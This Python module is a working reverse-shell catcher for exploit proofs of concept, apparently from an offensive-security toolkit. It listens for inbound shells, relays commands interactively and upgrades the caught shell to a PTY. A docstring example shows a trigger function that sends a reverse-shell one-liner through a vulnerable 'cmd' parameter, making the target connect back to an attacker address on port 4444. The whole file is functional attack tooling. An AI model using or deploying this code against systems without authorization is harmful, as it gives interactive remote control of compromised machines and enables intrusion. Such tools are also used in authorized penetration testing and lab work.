"""
Shell catcher utility for POCs.
Catch reverse shells directly in your exploit script.
"""
import builtins
import contextlib
import os
import readline # For command history
import select
import socket
import sys
import termios
import threading
import time
import tty
from your_project.utils.output import out
class ShellCatcher:
    """
    Simple reverse shell catcher for POCs.

    Listens on a TCP port, accepts a single inbound connection on a
    background thread, and then lets the caller send commands to it
    (``send_command``), try to upgrade it to a PTY (``stabilize``) or
    drive it interactively (``interact``).

    Examples:

    .. code-block:: python

        from utils.shell_catcher import ShellCatcher

        # Start listener in background
        catcher = ShellCatcher(4444)
        catcher.start()

        # Trigger your exploit here
        exploit_target()

        # Wait for shell and interact
        if catcher.wait_for_shell(timeout=10):
            catcher.interact()
    """

    def __init__(self, port, host="0.0.0.0"):
        """
        Store the listen address; no socket is opened until ``start()``.

        Args:
            port: TCP port to listen on.
            host: Local address to bind to (defaults to all interfaces).
        """
        self.host = host
        self.port = port
        self.listener = None  # listening socket, set once bound
        self.client = None  # accepted connection (the caught shell)
        self.thread = None  # background accept thread
        self.shell_caught = False  # set by the accept thread after accept()
        self.stabilized = False  # set by stabilize() on success

    def start(self):
        """
        Bind the listener, then accept one connection in a background thread.

        Binding happens synchronously so the port is really open when this
        method returns; only the blocking ``accept()`` runs in the thread.
        If the socket cannot be bound, the error is logged and no thread is
        started.
        """
        if not self._open_listener():
            return
        self.thread = threading.Thread(target=self._listen, daemon=True)
        self.thread.start()
        out.info(f"Shell catcher listening on {self.host}:{self.port}")

    def _open_listener(self):
        """Create, bind and listen on the socket; return True on success."""
        listener = None
        try:
            listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            listener.bind((self.host, self.port))
            listener.listen(1)
        except Exception as e:
            # Boundary handler: start() never raised for bind problems, so
            # keep reporting them through the logger instead.
            if listener is not None:
                with contextlib.suppress(OSError):
                    listener.close()
            out.error(f"Listener error: {e}")
            return False
        self.listener = listener
        return True

    def _listen(self):
        """Background thread body: accept a single connection."""
        try:
            # Allow direct use without start(): open the socket on demand.
            if self.listener is None and not self._open_listener():
                return
            conn, addr = self.listener.accept()
            self.client = conn
            out.success(f"Shell caught from {addr[0]}:{addr[1]}")
            # Set last so readers of the flag always find self.client set.
            self.shell_caught = True
        except Exception as e:
            out.error(f"Listener error: {e}")

    def wait_for_shell(self, timeout=30):
        """
        Wait for a shell to connect.

        Args:
            timeout: Maximum number of seconds to wait.

        Returns:
            True if a shell connected, False on timeout or if the listener
            is not running / stopped without accepting a connection.
        """
        out.status(f"Waiting for shell (timeout: {timeout}s)...")
        worker = self.thread
        if worker is not None:
            # The accept thread exits right after setting shell_caught (or
            # after logging an error), so joining it replaces polling and
            # returns early when the listener has already failed.
            worker.join(timeout)
        if self.shell_caught:
            return True
        if worker is None:
            out.error("Listener is not running (start() not called or bind failed)")
        elif worker.is_alive():
            out.error("Timeout waiting for shell")
        else:
            out.error("Listener stopped before a shell connected")
        return False

    def interact(self, use_raw=None):
        """
        Interact with the caught shell.

        Args:
            use_raw: Force raw TTY mode on/off. When None, raw mode is used
                only if the shell has been stabilized. Raw mode additionally
                requires stdin to be a TTY; otherwise line mode is used.
        """
        if not self.client:
            out.error("No shell connected")
            return
        # Auto-enable raw mode if shell is stabilized (unless explicitly set)
        if use_raw is None:
            use_raw = self.stabilized
        out.success("Entering interactive shell (type 'exit' to exit)")
        if not self.stabilized:
            out.info("Tip: Run catcher.stabilize() first for better shell")
        elif use_raw:
            out.info("Raw TTY mode enabled - full interactivity!")
        print()

        if not (use_raw and sys.stdin.isatty()):
            self._normal_interact()
            return

        stdin_fd = sys.stdin.fileno()
        # Save terminal settings so they can be restored whatever happens
        saved_attrs = termios.tcgetattr(stdin_fd)
        try:
            tty.setraw(stdin_fd)
            self._raw_interact()
        finally:
            self._restore_terminal(stdin_fd, saved_attrs)
            # Print newline to clean up terminal display
            sys.stdout.write("\n")
            sys.stdout.flush()

    @staticmethod
    def _restore_terminal(fd, attrs):
        """Best-effort restore of saved termios attributes on ``fd``."""
        try:
            # TCSANOW applies immediately, without waiting for pending output
            termios.tcsetattr(fd, termios.TCSANOW, attrs)
        except (termios.error, OSError):
            # Fallback to TCSAFLUSH if TCSANOW fails
            with contextlib.suppress(termios.error, OSError):
                termios.tcsetattr(fd, termios.TCSAFLUSH, attrs)

    def _normal_interact(self):
        """
        Line-based interaction: relay shell output and stdin lines.

        Ends when the remote closes the connection, stdin reaches EOF, or
        the user presses Ctrl-C. Always calls ``cleanup()`` on exit.
        """
        import codecs

        # Incremental decoding keeps multi-byte UTF-8 sequences intact when
        # they are split across two recv() calls.
        decoder = codecs.getincrementaldecoder("utf-8")(errors="replace")
        try:
            # NOTE(review): the readline module hooks input(), not
            # sys.stdin.readline(), so these bindings likely have no effect
            # on the loop below - kept unchanged from the original.
            readline.parse_and_bind("tab: complete")
            readline.parse_and_bind("set editing-mode emacs")
            while True:
                readable, _, _ = select.select([self.client, sys.stdin], [], [], 0.1)
                # Data from shell
                if self.client in readable:
                    data = self.client.recv(4096)
                    if not data:
                        break
                    sys.stdout.write(decoder.decode(data))
                    sys.stdout.flush()
                # Input from user
                if sys.stdin in readable:
                    line = sys.stdin.readline()
                    if not line:
                        # EOF on stdin: without this the loop would spin,
                        # because select() keeps reporting stdin readable.
                        break
                    self.client.sendall(line.encode())
        except KeyboardInterrupt:
            out.warning("\nExiting shell")
        except Exception as e:
            out.error(f"Shell error: {e}")
        finally:
            self.cleanup()

    def _raw_interact(self):
        """
        Raw mode interaction (better for PTY shells).

        Relays bytes unmodified between stdin/stdout and the socket. The
        caller is expected to have put the terminal in raw mode, hence the
        explicit ``\\r\\n`` line endings in the messages written here.
        """
        connection_closed = False
        # Last few typed bytes, used to detect exit commands
        input_buffer = b""
        stdin_fd = sys.stdin.fileno()
        stdout_fd = sys.stdout.fileno()
        try:
            while True:
                # exceptfds is used to notice socket error conditions
                readable, _, errored = select.select(
                    [self.client, sys.stdin], [], [self.client], 0.1
                )
                if self.client in errored:
                    connection_closed = True
                    break
                if self.client in readable:
                    try:
                        data = self.client.recv(4096)
                        if not data:
                            connection_closed = True
                            break
                        os.write(stdout_fd, data)
                    except OSError:
                        # Covers ConnectionResetError / BrokenPipeError too
                        connection_closed = True
                        break
                if sys.stdin in readable:
                    try:
                        data = os.read(stdin_fd, 4096)
                        if not data:
                            break
                        # Buffer last 10 bytes to detect exit commands
                        input_buffer = (input_buffer + data)[-10:]
                        # Send data to remote
                        self.client.sendall(data)
                        # Check if user typed exit command (with newline/return)
                        if b"exit\n" in input_buffer or b"exit\r" in input_buffer:
                            os.write(
                                stdout_fd,
                                b"[*] Exit detected, closing gracefully...\r\n",
                            )
                            # Give remote a moment to process exit and close
                            time.sleep(0.2)
                            # Show whatever the remote printed on its way out
                            with contextlib.suppress(OSError):
                                pending, _, _ = select.select([self.client], [], [], 0.1)
                                if self.client in pending:
                                    data = self.client.recv(4096)
                                    if data:
                                        os.write(stdout_fd, data)
                            connection_closed = True
                            break
                    except OSError:
                        connection_closed = True
                        break
        except KeyboardInterrupt:
            # Send newline to remote shell before exiting (best effort)
            with contextlib.suppress(Exception):
                self.client.sendall(b"\n")
        except Exception as e:
            # Report instead of silently dropping; still never propagate so
            # the caller can restore the terminal.
            with contextlib.suppress(OSError):
                os.write(stdout_fd, f"\r\n[!] Shell error: {e}\r\n".encode())
        finally:
            # Print message before terminal restoration
            if connection_closed:
                # Write directly to avoid buffering issues
                with contextlib.suppress(OSError):
                    os.write(stdout_fd, b"\r\n[*] Connection closed\r\n")

    def send_command(self, cmd, wait_response=True, timeout=2):
        """
        Send a single command and optionally collect its output.

        Args:
            cmd: Command text; a trailing newline is appended.
            wait_response: When True, gather output for ``timeout`` seconds.
            timeout: Collection window in seconds. The method reads until
                the window elapses or the remote closes the connection.

        Returns:
            The collected output decoded as UTF-8 (invalid bytes replaced),
            or None when no shell is connected or ``wait_response`` is False.
        """
        if not self.client:
            return None
        # sendall() retries until every byte is written; send() may not
        self.client.sendall(f"{cmd}\n".encode())
        if not wait_response:
            return None
        chunks = []
        # Monotonic clock: the window is unaffected by wall-clock changes
        deadline = time.monotonic() + timeout
        while True:
            remaining = deadline - time.monotonic()
            if remaining <= 0:
                break
            readable, _, _ = select.select([self.client], [], [], min(0.1, remaining))
            if self.client in readable:
                chunk = self.client.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        return b"".join(chunks).decode("utf-8", errors="replace")

    @staticmethod
    def _pick_binary(which_output, candidates):
        """
        Return the first name in ``candidates`` that ``which`` located.

        Only whitespace-separated tokens that are absolute paths are
        considered, matched by basename. This ignores an echoed command
        line, shell prompts and "no python in (...)"-style error messages,
        all of which contain the bare name without being a hit.

        Returns:
            The matching candidate name, or None if none was found.
        """
        located = {
            token.rsplit("/", 1)[-1]
            for token in (which_output or "").split()
            if token.startswith("/")
        }
        for name in candidates:
            if name in located:
                return name
        return None

    def _finish_upgrade(self):
        """Apply the local terminal size remotely and trigger a fresh prompt."""
        # Get local terminal size and apply to remote
        try:
            import shutil

            cols, rows = shutil.get_terminal_size()
            self.send_command(f"stty rows {rows} cols {cols}")
            out.info(f"Terminal size set to {rows}x{cols}")
        except (OSError, ValueError):
            out.warning(
                "Could not detect terminal size - use: stty rows <rows> cols <cols>"
            )
        # Clear any buffered output from setup commands
        self._drain_output()
        # Send newline to trigger prompt (don't drain after - we want to see the prompt!)
        self.client.sendall(b"\n")
        time.sleep(0.3)

    def stabilize(self):
        """
        Try to stabilize/upgrade the shell to a PTY.

        Tries a Python ``pty.spawn`` first (preferring python3, then
        python2, then python) and falls back to ``script -q /dev/null``.

        Returns:
            True if an upgrade command was issued (``self.stabilized`` is
            then set), False if no shell is connected or neither tool was
            located on the remote.
        """
        if not self.client:
            out.error("No shell connected")
            return False
        out.info("Attempting shell stabilization...")

        # Try Python PTY spawn
        out.status("Trying Python PTY upgrade...")
        response = self.send_command("which python python2 python3", timeout=1)
        py = self._pick_binary(response, ("python3", "python2", "python"))
        if py:
            self.send_command(f"{py} -c 'import pty;pty.spawn(\"/bin/bash\")'")
            time.sleep(0.5)
            # Set terminal settings
            self.send_command("export TERM=xterm-256color")
            self.send_command("export SHELL=/bin/bash")
            self._finish_upgrade()
            out.success("Shell upgraded to PTY")
            self.stabilized = True
            return True

        # Try script command if python not available
        out.status("Python not found, trying script command...")
        response = self.send_command("which script", timeout=1)
        if self._pick_binary(response, ("script",)):
            self.send_command("script -q /dev/null")
            time.sleep(0.5)
            self.send_command("export TERM=xterm-256color")
            self._finish_upgrade()
            out.success("Shell upgraded using script")
            self.stabilized = True
            return True

        out.warning("Could not upgrade shell (no python/script found)")
        return False

    def _drain_output(self, timeout=0.5):
        """
        Discard pending output from the shell.

        Stops as soon as nothing is readable within 0.1s, the remote closes
        the connection, a socket error occurs, or ``timeout`` seconds pass.
        """
        deadline = time.monotonic() + timeout
        while time.monotonic() < deadline:
            readable, _, _ = select.select([self.client], [], [], 0.1)
            if self.client not in readable:
                break
            try:
                if not self.client.recv(4096):
                    # Closed socket stays "readable"; stop instead of spinning
                    break
            except OSError:
                break

    def cleanup(self):
        """Close the client and listener sockets; safe to call repeatedly."""
        client, self.client = self.client, None
        if client is not None:
            # Each step is independent so a failure in one (e.g. shutdown on
            # an already-reset connection) never skips close().
            with contextlib.suppress(OSError):
                # Set socket timeout to prevent hanging on close
                client.settimeout(0.1)
            with contextlib.suppress(OSError):
                # Try graceful shutdown first
                client.shutdown(socket.SHUT_RDWR)
            with contextlib.suppress(OSError):
                client.close()
        listener, self.listener = self.listener, None
        if listener is not None:
            with contextlib.suppress(OSError):
                listener.close()
def quick_catch(
    port=4444, trigger_func=None, trigger_delay=1, wait_timeout=30, host="0.0.0.0"
):
    """
    Quick helper to catch a shell with optional trigger function.

    The trigger function should exploit the RCE vulnerability to make the
    target execute a reverse shell that connects back to your listener.

    Args:
        port: TCP port to listen on.
        trigger_func: Optional zero-argument callable invoked after the
            listener has been started.
        trigger_delay: Seconds to sleep between starting the listener and
            calling ``trigger_func``.
        wait_timeout: Seconds to wait for the shell to connect.
        host: Local address to bind the listener to.

    Returns:
        The ``ShellCatcher`` instance, whether or not a shell was caught.

    Examples:

    .. code-block:: python

        from your_project.utils.reverse_shells import python_oneliner

        def trigger():
            # Send reverse shell command to vulnerable RCE endpoint
            cmd = python_oneliner('10.10.14.5', 4444)
            # This makes the TARGET execute the reverse shell
            requests.get(f"http://target.com/vulnerable?cmd={cmd}")

        quick_catch(4444, trigger_func=trigger)

        # Or without a trigger (if you trigger manually):
        quick_catch(4444)  # Then trigger exploit separately
    """
    catcher = ShellCatcher(port, host)
    catcher.start()

    if trigger_func:
        out.status(f"Waiting {trigger_delay}s before triggering exploit...")
        time.sleep(trigger_delay)
        out.info("Triggering exploit...")
        trigger_func()

    if catcher.wait_for_shell(timeout=wait_timeout):
        catcher.interact()
    else:
        out.error("Failed to catch shell")
    return catcher
def auto_shell(port=4444, wait_timeout=30):
    """
    Context manager for shell catching with auto-wait.

    Entering the context starts the listener; leaving it closes the
    sockets. Reading ``shell_caught`` on the returned object blocks (once)
    for up to ``wait_timeout`` seconds if no shell has connected yet.

    Args:
        port: TCP port to listen on.
        wait_timeout: Seconds to wait for the shell to connect.

    Returns:
        A context-manager object that proxies ``send_command``,
        ``interact`` and ``stabilize`` to the underlying ``ShellCatcher``
        (available as its ``catcher`` attribute).

    Examples:

    .. code-block:: python

        with auto_shell(4444) as catcher:
            # Trigger exploit
            exploit_target()

            # Automatically waits for shell
            if catcher.shell_caught:
                catcher.send_command("id")
                catcher.interact()
    """

    class ShellContext:
        """Context-manager wrapper around a single ShellCatcher."""

        def __init__(self, port, timeout):
            self.catcher = ShellCatcher(port)
            self.timeout = timeout
            self._waited = False  # Track if we've already waited

        def __enter__(self):
            self.catcher.start()
            return self

        def __exit__(self, *args):
            # Cleanup immediately, no delay needed. Returns None, so any
            # exception raised inside the with-block propagates.
            self.catcher.cleanup()

        def wait_and_interact(self, use_raw=None):
            """Wait for shell and automatically enter interactive mode"""
            # Mark the wait as done so a later shell_caught read does not
            # block for a second full timeout after this one expired.
            self._waited = True
            if self.catcher.wait_for_shell(timeout=self.timeout):
                self.catcher.interact(use_raw)
                return True
            return False

        def send_command(self, cmd, wait_response=True, timeout=2):
            """Proxy to catcher's send_command"""
            return self.catcher.send_command(cmd, wait_response, timeout)

        def interact(self, use_raw=None):
            """Proxy to catcher's interact"""
            return self.catcher.interact(use_raw)

        def stabilize(self):
            """Proxy to catcher's stabilize"""
            return self.catcher.stabilize()

        @property
        def shell_caught(self):
            """Check if shell is caught, with auto-wait"""
            if not self.catcher.shell_caught and not self._waited:
                # Wait for shell if not caught yet (only once)
                self._waited = True
                self.catcher.wait_for_shell(timeout=self.timeout)
            return self.catcher.shell_caught

    return ShellContext(port, wait_timeout)